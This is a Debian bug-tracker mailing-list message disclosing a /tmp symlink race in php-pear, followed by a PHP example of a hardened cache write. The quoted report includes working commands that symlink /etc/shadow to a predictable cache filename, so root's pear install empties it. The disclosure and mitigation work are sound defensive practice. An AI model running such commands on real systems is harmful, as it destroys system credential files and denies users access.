[php-maint] Bug#759282: Bug#759282: [php-pear] "/tmp" symlink file clobbering

Ondřej Surý ondrej at sury.org
Tue Aug 26 09:20:14 UTC 2014


Control: forcemerge -1 682157

Yes, it's a known bug that php-pear is not safe on multiuser systems.

Ondrej

On Mon, Aug 25, 2014, at 21:28, vladz wrote:
> 
> Package: php-pear
> Version: 5.4.4-14+deb7u14
> Tags: security
> 
> PEAR commands such as "pear install [...]" write cache data into
> predictable filenames located in "/tmp/".  Unprivileged local users
> could use symlinks to clobber arbitrary files.
> 
> Temporary filenames ("$cachefile" and "$cacheidfile") are generated with
> the code above.  They are predictable as far as we know the extension
> name that is going to be installed (this name is used to construct the
> url for the MD5 checksum):
> 
>     $ cat -n /usr/share/php/PEAR/REST.php
>     [...]
>     59         $cachefile = $this->config->get('cache_dir') . DIRECTORY_SEPARATOR .
>     60             md5($url) . 'rest.cachefile';
>     [...]
>     194        $cacheidfile = $this->config->get('cache_dir') . DIRECTORY_SEPARATOR .
>     195            md5($url) . 'rest.cacheid';
> 
> For instance, when installing the "Mail_mime" extension, the following
> filenames are used by PEAR:
>   
>   - /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cachefile
>   - /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cacheid
> 
> In this case, the "$url" used for md5 checksum is the following:
> 
>     $ printf "http://pear.php.net/rest/p/mail_mime/info.xml" | md5sum
>     ff051dc5b96c95bf60e300d415b6c47e  -
> 
> To sum up, if a local user wants to clobber the "/etc/shadow" file, he
> runs:
> 
>     $ mkdir -p /tmp/pear/cache/
>     $ ln -s /etc/shadow /tmp/pear/cache/ff051dc5b96c95bf60e300d415b6c47erest.cachefile
> 
> Then when root runs PEAR, the file gets clobbered:
> 
>     # pear install Mail_mime
>     [...]
>     # du -sk /etc/shadow
>     0       /etc/shadow
> 
> A function like tempnam() could be used instead.  It creates a file with
> a unique filename (see http://php.net/manual/en/function.tempnam.php).
> 
> Regards,
> -- 
> http://vladz.devzero.fr
> PGP key 8F7E2D3C from pgp.mit.edu
> 


-- 
Ondřej Surý <ondrej at sury.org>
Knot DNS (https://www.knot-dns.cz/) – a high-performance DNS server
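
The tempnam() suggestion from the report, worked into a cache write that survives a pre-planted symlink. This is an added example, not PEAR's code and not part of either message; safeCacheWrite() and the demo directory are hypothetical, and it assumes a POSIX system with PHP's posix extension.

```php
<?php
// Added example, not PEAR's code. safeCacheWrite() is a hypothetical helper;
// only the md5($url) . 'rest.cachefile' naming comes from the report.
// Assumes POSIX and the posix extension.
function safeCacheWrite(string $cacheDir, string $url, string $data): string
{
    if (!file_exists($cacheDir) && !is_link($cacheDir)) {
        mkdir($cacheDir, 0700, true);
    }
    // lstat() does not follow symlinks, so a planted link is seen as a link.
    $st = @lstat($cacheDir);
    if ($st === false
        || ($st['mode'] & 0170000) !== 0040000   // must be a real directory
        || $st['uid'] !== posix_geteuid()        // owned by the caller
        || ($st['mode'] & 0022) !== 0) {         // not group/world-writable
        throw new RuntimeException("untrusted cache directory: $cacheDir");
    }
    // This checks the final directory only; its parents must not be
    // writable by other users (so a per-user path, not a shared /tmp).
    // tempnam() creates a new, unpredictably named file, but can fall back
    // to the system temp dir, so verify where the file actually landed.
    $tmp = tempnam($cacheDir, 'rest');
    if ($tmp === false || realpath(dirname($tmp)) !== realpath($cacheDir)) {
        if ($tmp !== false) { unlink($tmp); }
        throw new RuntimeException('could not create temp file in cache directory');
    }
    if (file_put_contents($tmp, $data) !== strlen($data)) {
        unlink($tmp);
        throw new RuntimeException('short write');
    }
    // rename(2) replaces whatever is at the destination name, including a
    // symlink, rather than writing through it.
    $final = $cacheDir . DIRECTORY_SEPARATOR . md5($url) . 'rest.cachefile';
    if (!rename($tmp, $final)) {
        unlink($tmp);
        throw new RuntimeException('rename failed');
    }
    return $final;
}

// Constructed demo: a decoy file stands in for a sensitive target.
$dir = sys_get_temp_dir() . '/pear-cache-demo-' . getmypid();
$url = 'http://pear.php.net/rest/p/mail_mime/info.xml';
mkdir($dir, 0700);
file_put_contents("$dir/decoy", "keep me\n");
symlink("$dir/decoy", $dir . '/' . md5($url) . 'rest.cachefile');
$final = safeCacheWrite($dir, $url, serialize(['demo' => true]));
var_dump(is_link($final));                 // is the cache name still a symlink?
var_dump(file_get_contents("$dir/decoy")); // contents of the decoy afterwards
```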


